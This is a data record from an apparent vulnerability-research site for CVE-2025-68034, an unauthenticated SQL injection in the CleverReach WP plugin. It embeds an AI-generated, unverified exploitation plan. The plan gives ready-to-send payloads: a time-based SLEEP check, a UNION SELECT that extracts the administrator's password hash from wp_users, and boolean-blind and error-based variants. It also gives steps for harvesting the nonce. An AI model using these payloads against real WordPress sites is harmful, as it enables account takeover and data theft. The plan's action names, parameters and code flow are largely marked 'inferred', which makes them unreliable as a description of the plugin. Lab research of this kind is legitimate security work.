[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqS7GzCVzPfB3V33whUi5kuzPy4MHXzT4bnKcntWgUpc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2025-68034","cleverreach-wp-unauthenticated-sql-injection","CleverReach® WP \u003C= 1.5.21 - Unauthenticated SQL Injection","The CleverReach® WP plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.5.21 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","cleverreach-wp",null,"\u003C=1.5.21","1.5.22","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-15 00:00:00","2026-01-30 20:39:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F17ee6e87-2534-4397-833e-e0a1cd5d947c?source=api-prod",16,[],"researched",false,3,"This research plan focuses on identifying and exploiting the unauthenticated SQL injection vulnerability in the CleverReach® WP plugin (CVE-2025-68034).\n\n### 1. Vulnerability Summary\nThe CleverReach® WP plugin (\u003C= 1.5.21) fails to properly sanitize and prepare a user-supplied parameter before using it in a database query. Specifically, an unauthenticated AJAX handler likely concatenates a request parameter (e.g., `form_id`, `id`, or a `hash`) directly into a SQL statement. This allows an attacker to manipulate the query logic, leading to the extraction of sensitive data from the WordPress database, such as administrator password hashes and secret keys.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** The plugin registers `wp_ajax_nopriv_` hooks. Based on the plugin's purpose (forms and subscriptions), the likely actions are:\n    *   `cleverreach_ajax_get_form` (inferred)\n    *   `cleverreach_subscribe` (inferred)\n*   **Vulnerable Parameter:** A parameter such as `form_id`, `crwp_id`, or `id`.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. 
A CleverReach form may need to be published or a specific shortcode must exist on a page to trigger the script localization that contains the necessary nonce (if enforced).\n\n### 3. Code Flow (Trace)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with an `action` parameter.\n2.  **Hook Registration:** The plugin registers a handler in its main class or an AJAX handler class:\n    `add_action( 'wp_ajax_nopriv_cleverreach_ajax_get_form', array( $this, 'get_form_callback' ) );` (inferred).\n3.  **Parameter Extraction:** Inside the callback (e.g., `get_form_callback`), the code retrieves input:\n    `$form_id = $_POST['form_id'];`\n4.  **Database Sink:** The `$form_id` is passed into a query method without `$wpdb->prepare()`:\n    `$wpdb->get_results( \"SELECT * FROM {$wpdb->prefix}cleverreach_forms WHERE form_id = \" . $form_id );` (inferred).\n5.  **Execution:** The SQL injection occurs as the attacker appends `UNION SELECT` or boolean logic to the `$form_id`.\n\n### 4. Nonce Acquisition Strategy\nIf the `nopriv` AJAX handler enforces a nonce check (which is common for WP plugins even if they are vulnerable to SQLi), follow these steps:\n\n1.  **Locate Script Localization:** The plugin likely uses `wp_localize_script` to pass a nonce to its frontend JS.\n2.  **Identify Shortcode:** Search the source for `add_shortcode`. Likely: `[cleverreach]`.\n3.  **Setup Page:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"CR Test\" --post_content='[cleverreach]'` (Note: You may need a valid form ID in the shortcode, e.g., `[cleverreach id=\"1\"]`).\n4.  **Extract Nonce:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to find the localization object. Look for strings like `cleverreach_vars` or `crwp_ajax`.\n    *   **JS Identifier:** `window.cleverreach_vars?.nonce` or `window.cr_ajax_object?.security` (inferred).\n\n### 5. 
Exploitation Strategy\n\n#### Step 1: Confirm Injection (Time-based)\nWe will first use a time-based sleep to confirm the vulnerability without needing to know the table structure.\n*   **Tool:** `http_request`\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-encoded):**\n    ```\n    action=cleverreach_ajax_get_form&form_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&_wpnonce=[EXTRACTED_NONCE]\n    ```\n\n#### Step 2: UNION-Based Data Extraction\nOnce confirmed, we attempt to extract the admin password hash.\n1.  **Find Column Count:** Iterate `ORDER BY X` (X = 1, 2, 3, ...) until an error or change in response occurs; the last X that still returns normally is the column count.\n2.  **Payload:**\n    ```\n    action=cleverreach_ajax_get_form&form_id=-1 UNION SELECT 1,2,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -\n    ```\n    *(Adjust the number of UNION columns to match the count found in the ORDER BY step above. The table name assumes the default `wp_` prefix; substitute the site's actual prefix if it differs.)*\n\n### 6. Test Data Setup\n*   **Plugin Installation:** Ensure `cleverreach-wp` version 1.5.21 is installed.\n*   **Database Entry:** Since the query likely targets a plugin-specific table, ensure at least one form exists so the original query doesn't return empty before the injection:\n    `wp db query \"INSERT INTO wp_cleverreach_forms (form_id, name) VALUES (1, 'Test Form');\"` (table name inferred).\n*   **Published Page:** Create a page with the shortcode as described in Section 4.\n\n### 7. Expected Results\n*   **Time-based:** The server response should arrive roughly 5 seconds later than a baseline request that omits the payload (network jitter means the delay will not be exact).\n*   **UNION-based:** The response body (JSON or HTML) will contain a string starting with `$P$` or `$wp$2y$` (the WordPress password hash for the administrator).\n\n### 8. Verification Steps\nAfter the exploit, verify the data using WP-CLI:\n1.  `wp user get 1 --field=user_pass`\n2.  Compare the hash returned by the HTTP request with the hash retrieved via WP-CLI. If they match, the SQL injection is confirmed.\n\n### 9. Alternative Approaches\n*   **Boolean-Based Blind:** If the plugin returns different results for \"Form Found\" vs \"Form Not Found\" but suppresses SQL errors, use:\n    `form_id=1 AND (SELECT ASCII(SUBSTRING(user_pass,1,1)) FROM wp_users WHERE ID=1)>64`\n*   **Error-Based:** If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()` to force the hash into an error message:\n    `form_id=1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)`\n    (MySQL truncates the XPath error text to 32 characters, so a full hash has to be pulled with `SUBSTRING()` over several requests.)\n*   **Different Actions:** If `cleverreach_ajax_get_form` is not the sink, grep the plugin for `wp_ajax_nopriv` and check the callbacks for any `$wpdb` call (`query`, `get_results`, `get_row`, `get_var`, `get_col`) whose SQL is built by concatenation rather than `$wpdb->prepare()`.","gemini-3-flash-preview","2026-05-05 09:03:42","2026-05-05 09:05:23",{"type":30,"vulnerable_version":31,"fixed_version":11,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":34,"fixed_zip":35,"all_tags":36},"plugin","1.5.21","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcleverreach-wp\u002Ftags\u002F1.5.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcleverreach-wp.1.5.21.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcleverreach-wp\u002Ftags\u002F1.5.22","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcleverreach-wp.1.5.22.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcleverreach-wp\u002Ftags"]